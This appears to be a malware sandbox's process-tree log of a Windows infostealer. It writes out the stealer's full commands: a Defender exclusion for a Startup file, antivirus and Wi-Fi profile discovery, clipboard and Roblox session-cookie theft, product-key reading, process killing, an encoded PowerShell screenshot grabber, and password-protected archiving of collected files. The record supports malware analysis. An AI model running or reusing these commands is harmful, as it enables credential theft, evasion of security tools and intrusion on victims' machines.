C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Wait 5 Seconds then Install Driver', 0, 'WinWare', 16+16);close()""3⤵PID:5844
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Wait 5 Seconds then Install Driver', 0, 'WinWare', 16+16);close()"4⤵PID:5764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:456
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:2004
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵PID:3736
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵PID:592
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4600
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3964
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:2104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:716
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3308
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:2416
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5668
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4964
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5316 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1952
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:5264
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:5300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5032 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d5pb5srf\d5pb5srf.cmdline"5⤵PID:5964
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14F5.tmp" "c:\Users\Admin\AppData\Local\Temp\d5pb5srf\CSC9E4DCCE6FB7A41A0ABBF4BD72777D53.TMP"6⤵PID:3320
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1608
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:592
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4776
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4412
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5468
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1100
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1884
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5540
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3728"3⤵PID:796
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 37284⤵
- Kills process with taskkill
PID:3796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3728"3⤵PID:5776
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3740
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 37284⤵
- Kills process with taskkill
PID:4704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2992"3⤵PID:2000
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29924⤵
- Kills process with taskkill
PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2992"3⤵PID:1608
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29924⤵
- Kills process with taskkill
PID:4124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4128"3⤵PID:5560
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41284⤵
- Kills process with taskkill
PID:5956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4128"3⤵PID:4464
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41284⤵
- Kills process with taskkill
PID:5444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3852"3⤵PID:2292
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38524⤵
- Kills process with taskkill
PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3852"3⤵PID:2348
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38524⤵
- Kills process with taskkill
PID:1884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1420"3⤵PID:6108
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14204⤵
- Kills process with taskkill
PID:5212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1420"3⤵PID:3840
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14204⤵
- Kills process with taskkill
PID:5964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 944"3⤵PID:5224
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9444⤵
- Kills process with taskkill
PID:4484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 944"3⤵PID:3048
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9444⤵
- Kills process with taskkill
PID:5064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5604"3⤵PID:1584
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 56044⤵
- Kills process with taskkill
PID:2260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5604"3⤵PID:6116
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 56044⤵
- Kills process with taskkill
PID:1200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5880"3⤵PID:3032
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 58804⤵
- Kills process with taskkill
PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5880"3⤵PID:4324
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 58804⤵
- Kills process with taskkill
PID:1220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5616"3⤵PID:3452
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 56164⤵
- Kills process with taskkill
PID:2328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5616"3⤵PID:3728
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 56164⤵
- Kills process with taskkill
PID:3160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:4776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:3132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:5944
-
C:\Windows\system32\getmac.exegetmac4⤵PID:5740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19402\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\LfB0L.zip" *"3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\_MEI19402\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI19402\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\LfB0L.zip" *4⤵
- Executes dropped EXE
PID:1440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4824
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:1676
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:1836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:5280
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:3628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:3136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:1128
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:72
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:2636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5508
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:2176 -
